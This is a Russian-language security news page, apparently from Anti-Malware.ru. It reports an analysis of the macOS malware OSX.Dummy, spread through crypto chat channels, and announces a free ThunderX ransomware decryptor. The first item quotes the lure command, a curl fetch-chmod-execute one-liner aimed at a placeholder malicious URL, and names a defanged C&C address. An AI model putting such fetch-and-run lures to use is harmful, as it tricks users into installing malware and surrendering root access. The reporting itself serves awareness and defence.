Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Пострадавшие от ThunderX теперь могут бесплатно расшифровать свои файлы

Пользователи и организации, пострадавшие от атаки программы-вымогателя ThunderX, теперь могут бесплатно расшифровать свои файлы. А всё благодаря команде Tesorion, разработавшей дешифратор.

Семейство шифровальщиков ThunderX ещё довольно молодое — первые атаки этой вредоносной программы эксперты зафиксировали в конце августа 2020 года.

Чуть позже исследователи в области кибербезопасности нашли баг в процессе шифрования, которое использовал ThunderX. Именно ошибка в коде помогла специалистам разработать инструмент для восстановления данных жертв.

Новый дешифратор работает с текущей версией ThunderX, которая добавляет к зашифрованным файлам расширение .tx_locked. Чтобы расшифровать свои данные, пользователи должны загрузить копию записки с требованиями (readme.txt) и один из пострадавших файлов. Тогда дешифратор выдаст нужный ключ.

 

Саму утилиту для расшифровки можно скачать с сайта проекта NoMoreRansom — здесь. По завершении дешифровки программа покажет количество успешно восстановленных файлов, а также число тех, что расшифровать не удалось.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru